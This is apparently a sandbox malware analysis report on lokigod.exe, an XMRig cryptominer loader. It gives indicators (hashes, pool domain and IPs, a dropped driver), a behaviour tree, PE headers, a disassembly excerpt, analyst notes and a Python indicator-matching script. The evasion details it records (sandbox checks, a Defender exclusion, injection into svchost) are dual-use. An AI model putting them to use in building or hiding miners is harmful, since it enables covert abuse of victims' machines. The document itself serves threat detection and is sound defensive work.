       |    Signatures: Query firmware table information (likely to detect VMs); Found strings related to Crypto-Mining; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
       +- powershell.exe (node 18): Loading BitLocker PowerShell Module -> conhost.exe (32)
       +- cmd.exe (node 20) -> 2 other processes (44)
       +- 10 other processes (node 28) -> 9 other processes (46)

Reading the tree: lokigod.exe only stages (drops the ProgramData copy and zeroes the power timeouts); the ProgramData copy does the work (drops the driver, excludes a directory from Defender, injects a thread). The svchost.exe at node 14 is a child of that copy, not of services.exe, and it is the process that holds the XMRig strings in memory and opens the pool connection, so it is the injected miner host rather than a Windows service.

Antivirus results (Source | Detection | Scanner | Label)

Submitted file:
  lokigod.exe | 76% | ReversingLabs | Win64.Infostealer.Tinba
Dropped files:
  C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe | 76% | ReversingLabs | Win64.Infostealer.Tinba
  C:\Windows\Temp\gdtmkvyhysuy.sys | 5% | ReversingLabs | (no label)
Remaining scanner tables: No Antivirus matches

Note: the vendor family label (Tinba, a banking trojan) does not agree with what the behavior and the Yara hit show, an XMRig miner with a dropped driver; treat the label as detection metadata and classify from behavior. The driver's 5% means few engines flag it, which is why its cross-sample reuse (see the Joe Sandbox View context for the dropped file) matters more than its scan score.
Contacted domains (Name | IP | Active | Malicious | Reputation)
  pool.hashvault.pro | 37.203.243.102 | active: true | malicious: false | reputation: high
  windowsupdatebg.s.llnwi.net | 178.79.238.0 | active: true | malicious: false | reputation: high

Note: "malicious: false, reputation: high" is the feed's view of the host, and a public mining pool is not malware in itself. What makes the contact an indicator here is the process making it: an svchost.exe spawned by the ProgramData copy of the sample (see the behavior graph). The second domain is a Windows Update content-delivery host reached by the operating system during the run and is unrelated to the sample.

URLs found in memory (Name | Source | Malicious | Reputation)
  https://xmrig.com/docs/algorithms | svchost.exe, 0000003B.00000002.3311685966.0000000140001000.00000040.00000001.00020000.00000000.sdmp | malicious: false | reputation: high

Note: this is XMRig's own documentation URL as a string inside the miner image mapped into svchost.exe; it is not among the contacted domains and is useful as a memory-scan indicator, not as a network one.
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious)
  37.203.243.102 | pool.hashvault.pro | Russian Federation | 44964 | DAPLDATAPLANETLtdRU | false
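An indicator matcher for the network artefacts above, as an added example that is not code from the Joe Sandbox report. The domain and IP values are taken from this report; the record format, the process and parent fields, and the lineage rule (svchost.exe whose parent is not services.exe, which is what the behavior graph shows for the miner host here) are assumptions of the example, and the records are constructed. It also pivots from a matched domain to whatever address it resolved to, because the Joe Sandbox View context for pool.hashvault.pro shows the same pool name resolving to several different addresses across submissions.

```python
"""Match DNS and connection records against this report's mining-pool indicators.

Added example; not code from the Joe Sandbox report. Indicator values come from
the report (pool.hashvault.pro, 37.203.243.102, TCP 443). The record format,
the process/parent fields and the svchost lineage rule are assumptions of this
example; the records are constructed.
"""

POOL_DOMAINS = {"pool.hashvault.pro"}
POOL_IPS = {"37.203.243.102"}


def domain_matches(name: str, watchlist) -> bool:
    """True when name equals a watched domain or is a subdomain of one."""
    name = name.lower().rstrip(".")
    return any(name == d or name.endswith("." + d) for d in watchlist)


def analyse(records) -> list:
    """Return findings for records touching the pool or showing an odd svchost parent.

    A matched DNS answer is added to the IP watchlist on the fly: the pool name is
    the durable indicator, its address changes between samples.
    """
    watched_ips = set(POOL_IPS)
    findings = []
    for rec in records:
        reasons = []
        if rec["type"] == "dns" and domain_matches(rec["query"], POOL_DOMAINS):
            reasons.append("dns:mining-pool-domain")
            watched_ips.add(rec["answer"])
        if rec["type"] == "conn" and rec["dst"] in watched_ips:
            reasons.append("conn:mining-pool-ip:%s:%d" % (rec["dst"], rec["dport"]))
        # svchost.exe is normally a child of services.exe; in this report it is a
        # child of the ProgramData dropper, i.e. the injected miner host.
        if rec["process"].lower() == "svchost.exe" and rec["parent"].lower() != "services.exe":
            reasons.append("lineage:svchost-parent-" + rec["parent"].lower())
        if reasons:
            findings.append({"process": rec["process"], "parent": rec["parent"], "reasons": reasons})
    return findings


# Constructed records: the first two mirror the sandbox trace, the next two are the
# benign Windows Update CDN lookup seen in the same trace, the last two show the
# name-to-IP pivot on an address the pool used in another submission.
SAMPLE_RECORDS = [
    {"type": "dns", "process": "svchost.exe", "parent": "vzppfnnlsyit.exe",
     "query": "pool.hashvault.pro", "answer": "37.203.243.102"},
    {"type": "conn", "process": "svchost.exe", "parent": "vzppfnnlsyit.exe",
     "dst": "37.203.243.102", "dport": 443, "sport": 49704},
    {"type": "dns", "process": "svchost.exe", "parent": "services.exe",
     "query": "windowsupdatebg.s.llnwi.net", "answer": "178.79.238.0"},
    {"type": "conn", "process": "svchost.exe", "parent": "services.exe",
     "dst": "178.79.238.0", "dport": 443, "sport": 49710},
    {"type": "dns", "process": "svchost.exe", "parent": "vzppfnnlsyit.exe",
     "query": "pool.hashvault.pro", "answer": "45.76.89.70"},
    {"type": "conn", "process": "svchost.exe", "parent": "vzppfnnlsyit.exe",
     "dst": "45.76.89.70", "dport": 443, "sport": 49712},
]

if __name__ == "__main__":
    for finding in analyse(SAMPLE_RECORDS):
        print(finding)
```

Port 443 is deliberately not part of the match: the report shows the pool on 443, but a port is the weakest of the three signals and would only let a config change evade the rule.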
                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1568489
                Start date and time:2024-12-04 17:04:05 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 7m 17s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:62
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:lokigod.exe
                Detection:MAL
                Classification:mal100.spyw.evad.mine.winEXE@88/12@2/1
                EGA Information:
                • Successful, ratio: 25%
                HCA Information:Failed
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                • Excluded IPs from analysis (whitelisted): 4.245.163.56, 40.69.42.241
                • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target lokigod.exe, PID 7320 because it is empty
                • Execution Graph export aborted for target svchost.exe, PID 7636 because there are no executed function
                • Execution Graph export aborted for target vzppfnnlsyit.exe, PID 5268 because it is empty
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtCreateKey calls found.
                • VT rate limit hit for: lokigod.exe
Time | Type | Description
  11:04:57 | API Interceptor | 1x Sleep call for process: lokigod.exe modified
  11:05:01 | API Interceptor | 30x Sleep call for process: powershell.exe modified
Joe Sandbox View context: other submissions that share an indicator with this sample (Match | Associated Sample Name / URL | Detection | Threat Name | Context)

IP 37.203.243.102:
  xblkpfZ8Y4.exe | malicious | Xmrig

Domain pool.hashvault.pro (context: the address the name resolved to in that submission):
  xblkpfZ8Y4.exe | malicious | Xmrig | 5.188.137.200
  0kToM9fVGQ.exe | malicious | Xmrig | 45.76.89.70
  prog.exe | malicious | Xmrig | 95.179.241.203
  bypass.exe | malicious | Xmrig | 95.179.241.203
  loader.exe | malicious | Xmrig | 142.202.242.43
  7K5DrSyL8Y.exe | malicious | Xmrig | 45.76.89.70
  eshkere.bat | malicious | Xmrig | 95.179.241.203
  frik.exe | malicious | Xmrig | 95.179.241.203
  Google Chrome.exe | malicious | Xmrig | 45.76.89.70
  e7WMhx18XN.exe | malicious | SilentXMRMiner, Xmrig | 45.76.89.70
  Note: across these submissions the pool name has resolved to at least five different addresses, so the domain is the durable indicator; the address seen in this run is only one of them.

Domain windowsupdatebg.s.llnwi.net:
  https://bdb142c8309e44b2310105b0e00240d6.surge.sh/ | malicious | Unknown | 178.79.238.128
  http://divisioninfo.net/ | malicious | Unknown | 178.79.238.0
  001.xls | malicious | Get2Downloader | 178.79.238.128
  442.docx.exe | malicious | RMSRemoteAdmin | 178.79.238.128
  Account Review Desk - Help us keep your VAT account accurate.msg | malicious | CredentialStealer | 178.79.238.0
  NF---710.msi | malicious | AteraAgent | 178.79.238.128
  REMITTANCE_PAYMENT54342Saic.html | malicious | Phisher | 178.79.238.0
  Compilazione di video e immagini protetti da copyright.bat | malicious | Unknown | 178.79.238.128
  http://esaleerugs.com | malicious | Unknown | 178.79.238.0
  KAHILINGAN NG BADYET 25-11-2024#U00b7pdf.vbs | malicious | Remcos, GuLoader | 178.79.238.128
  Note: this is a Windows Update content-delivery host that the operating system contacts on its own; the unrelated families sharing it show it is background noise, not an indicator for this sample.

ASN DAPLDATAPLANETLtdRU:
  xblkpfZ8Y4.exe | malicious | Xmrig | 37.203.243.102
  v859oajfVH.elf | malicious | Unknown | 37.203.242.178
  oAUrOBvfbV.elf | malicious | Mirai | 93.188.42.246
  x86_64-20220704-2102 | malicious | Mirai | 93.188.42.210
  9faoC0drSo | malicious | Mirai | 93.188.42.249
  arm | malicious | Mirai | 93.188.42.224
  eqqFDsQ1Jq | malicious | Mirai | 93.188.42.241
  QeykTlqE4S | malicious | Mirai | 93.188.42.232

No context

Dropped file C:\Windows\Temp\gdtmkvyhysuy.sys, also dropped by:
  nfkciRoR4j.exe | malicious | Xmrig
  File.exe | malicious | Orcus, Xmrig
  rLaC8kO1rD.exe | malicious | Xmrig
  newtpp.exe | malicious | Xmrig
  main.exe | malicious | Blank Grabber, SilentXMRMiner, Xmrig
  6xQ8CMUaES.exe | malicious | Xmrig
  4o8Tgrb384.exe | malicious | Xmrig
  0kToM9fVGQ.exe | malicious | Xmrig
  m2.exe | malicious | Xmrig
  ICBM-noml.exe | malicious | Xmrig
  Note: the same driver turns up in ten other XMRig-related submissions (0kToM9fVGQ.exe also appears in the pool-domain list above), so its hash is a reusable hunting indicator for this loader family even though only 5% of engines flag it.
                                      Process:C:\Users\user\Desktop\lokigod.exe
                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):5265920
                                      Entropy (8bit):6.532806304390814
                                      Encrypted:false
                                      SSDEEP:98304:CZtFWHS5GGYCdrURVNMjxcJMWQEiNXiRr5k6bbm9dz6O/9Py4TZBZhdy2ZhoS:C0HS8dCjmMWQEBRr5kE4/lPy4zZPyqhT
                                      MD5:769EA3D0E0CF22EAA7526A89C0F438CF
                                      SHA1:5221042AD60744E2BDCF8319FF00BDBFC253EB59
                                      SHA-256:B369C94A835882A2267FF0A7A4EBB9A91621C3F134F63010D491121A7827B448
                                      SHA-512:D50130430911F16F4D2F7E4D3552F51CEB74601EDA13CFBC374C9327E11D7865BDFC49803B54CF7B595B89996DB28D3173D7A22993E968FD9A1A080C6B434C9A
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 76%
                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...}.Kg.........."...........O.....@..........@..............................P...........`.....................................................<.............P...............P.x...............................(.......8...............x............................text............................... ..`.rdata...=.......>..................@..@.data....O......^O.................@....pdata........P......RP.............@..@.00cfg........P......TP.............@..@.tls..........P......VP.............@....reloc..x.....P......XP.............@..B................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):64
                                      Entropy (8bit):1.1510207563435464
                                      Encrypted:false
                                      SSDEEP:3:Nlllullkv/tz:NllU+v/
                                      MD5:6442F277E58B3984BA5EEE0C15C0C6AD
                                      SHA1:5343ADC2E7F102EC8FB6A101508730898CB14F57
                                      SHA-256:36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
                                      SHA-512:F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
                                      Malicious:false
                                      Preview:@...e................................................@..........
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):64
                                      Entropy (8bit):1.1510207563435464
                                      Encrypted:false
                                      SSDEEP:3:NlllulvX/Z:NllUvX
                                      MD5:E55E6E0E1AB6A345A7BCC5FD9C39F70C
                                      SHA1:E5344BE0ED383244752DD96C35183014062EB114
                                      SHA-256:9635856D4CAE632D612BDD5736CEA8F6B6AEEBD6FE3AEB04A842FBDB386BCC91
                                      SHA-512:74908F7F2D21452483A47A25A5728B9211215C6DB2591E94806E477B6B870C92BCE7E11D64A6E9B4AB225927869AD5440ED2995CCA42FD6C8612B027F994A2A5
                                      Malicious:false
                                      Preview:@...e................................................@..........
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe
                                      File Type:PE32+ executable (native) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):14544
                                      Entropy (8bit):6.2660301556221185
                                      Encrypted:false
                                      SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                      MD5:0C0195C48B6B8582FA6F6373032118DA
                                      SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                      SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                      SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 5%
                                      Joe Sandbox View:
                                      • Filename: nfkciRoR4j.exe, Detection: malicious
                                      • Filename: File.exe, Detection: malicious
                                      • Filename: rLaC8kO1rD.exe, Detection: malicious
                                      • Filename: newtpp.exe, Detection: malicious
                                      • Filename: main.exe, Detection: malicious
                                      • Filename: 6xQ8CMUaES.exe, Detection: malicious
                                      • Filename: 4o8Tgrb384.exe, Detection: malicious
                                      • Filename: 0kToM9fVGQ.exe, Detection: malicious
                                      • Filename: m2.exe, Detection: malicious
                                      • Filename: ICBM-noml.exe, Detection: malicious
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                      File type:PE32+ executable (GUI) x86-64, for MS Windows
                                      Entropy (8bit):6.532806304390814
                                      TrID:
                                      • Win64 Executable GUI (202006/5) 92.65%
                                      • Win64 Executable (generic) (12005/4) 5.51%
                                      • Generic Win/DOS Executable (2004/3) 0.92%
                                      • DOS Executable Generic (2002/1) 0.92%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:lokigod.exe
                                      File size:5'265'920 bytes
                                      MD5:769ea3d0e0cf22eaa7526a89c0f438cf
                                      SHA1:5221042ad60744e2bdcf8319ff00bdbfc253eb59
                                      SHA256:b369c94a835882a2267ff0a7a4ebb9a91621c3f134f63010d491121a7827b448
                                      SHA512:d50130430911f16f4d2f7e4d3552f51ceb74601eda13cfbc374c9327e11d7865bdfc49803b54cf7b595b89996db28d3173d7a22993e968fd9a1a080c6b434c9a
                                      SSDEEP:98304:CZtFWHS5GGYCdrURVNMjxcJMWQEiNXiRr5k6bbm9dz6O/9Py4TZBZhdy2ZhoS:C0HS8dCjmMWQEBRr5kE4/lPy4zZPyqhT
                                      TLSH:5D3623BCA9BF4D3ED4490033FEADD345B9264539874027098ABF44E5AAA05F8177CEC9
                                      File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...}.Kg.........."...........O.....@..........@..............................P...........`........................................
                                      Icon Hash:00928e8e8686b000
                                      Entrypoint:0x140001140
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x140000000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x674B187D [Sat Nov 30 13:51:57 2024 UTC]
                                      TLS Callbacks:0x40001760, 0x1, 0x400017e0, 0x1
                                      CLR (.Net) Version:
                                      OS Version Major:6
                                      OS Version Minor:0
                                      File Version Major:6
                                      File Version Minor:0
                                      Subsystem Version Major:6
                                      Subsystem Version Minor:0
                                      Import Hash:3b819c3dfb34bc24b00db0746b529d11
                                      Instruction
                                      dec eax
                                      sub esp, 28h
                                      dec eax
                                      mov eax, dword ptr [0000BED5h]
                                      mov dword ptr [eax], 00000001h
                                      call 00007F17551A370Fh
                                      nop
                                      nop
                                      nop
                                      dec eax
                                      add esp, 28h
                                      ret
                                      nop
                                      inc ecx
                                      push edi
                                      inc ecx
                                      push esi
                                      push esi
                                      push edi
                                      push ebx
                                      dec eax
                                      sub esp, 20h
                                      dec eax
                                      mov eax, dword ptr [00000030h]
                                      dec eax
                                      mov edi, dword ptr [eax+08h]
                                      dec eax
                                      mov esi, dword ptr [0000BEC9h]
                                      xor eax, eax
                                      dec eax
                                      cmpxchg dword ptr [esi], edi
                                      sete bl
                                      je 00007F17551A3730h
                                      dec eax
                                      cmp edi, eax
                                      je 00007F17551A372Bh
                                      dec esp
                                      mov esi, dword ptr [0000F769h]
                                      nop word ptr [eax+eax+00000000h]
                                      mov ecx, 000003E8h
                                      inc ecx
                                      call esi
                                      xor eax, eax
                                      dec eax
                                      cmpxchg dword ptr [esi], edi
                                      sete bl
                                      je 00007F17551A3707h
                                      dec eax
                                      cmp edi, eax
                                      jne 00007F17551A36E9h
                                      dec eax
                                      mov edi, dword ptr [0000BE90h]
                                      mov eax, dword ptr [edi]
                                      cmp eax, 01h
                                      jne 00007F17551A370Eh
                                      mov ecx, 0000001Fh
                                      call 00007F17551AE494h
                                      jmp 00007F17551A3729h
                                      cmp dword ptr [edi], 00000000h
                                      je 00007F17551A370Bh
                                      mov byte ptr [00505A81h], 00000001h
                                      jmp 00007F17551A371Bh
                                      mov dword ptr [edi], 00000001h
                                      dec eax
                                      mov ecx, dword ptr [0000BE7Ah]
                                      dec eax
                                      mov edx, dword ptr [0000BE7Bh]
                                      call 00007F17551AE48Bh
                                      mov eax, dword ptr [edi]
                                      cmp eax, 01h
                                      jne 00007F17551A371Bh
                                      dec eax
                                      mov ecx, dword ptr [0000BE50h]
                                      Name | Virtual Address | Virtual Size | Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0x105f8 | 0x3c | .rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x50a000 | 0x1a4 | .pdata
                                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x50d000 | 0x78 | .reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_TLS | 0xd0a0 | 0x28 | .rdata
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xd410 | 0x138 | .rdata
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_IAT | 0x107b0 | 0x178 | .rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                      Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                      .text | 0x1000 | 0xb116 | 0xb200 | e2c882a8b1fc9c281cfd95fcfc111d33 | False | 0.47934954353932585 | data | 6.157073251509243 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rdata | 0xd000 | 0x3dec | 0x3e00 | da21ae6d5cfabae6999c08804fe14dc7 | False | 0.5170110887096774 | data | 4.846372622893658 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data | 0x11000 | 0x4f8bd8 | 0x4f5e00 | 4e3eeeaede1374b23a44abee51866339 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .pdata | 0x50a000 | 0x1a4 | 0x200 | 595d2386378e684c41a7598fc6141c3b | False | 0.53515625 | data | 3.681837602251576 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .00cfg | 0x50b000 | 0x10 | 0x200 | b18c7380298e104adf73576fa46bccc1 | False | 0.04296875 | data | 0.15127132530476972 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .tls | 0x50c000 | 0x10 | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .reloc | 0x50d000 | 0x78 | 0x200 | d354ce822692a4974e48c35143fe8dbe | False | 0.232421875 | data | 1.4571730891632382 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                      DLL | Import
                                      msvcrt.dll | __C_specific_handler, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _fmode, _initterm, _onexit, _time64, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, memset, rand, signal, srand, strlen, strncmp, vfprintf, wcscat, wcscpy, wcslen, wcsncmp, wcsstr
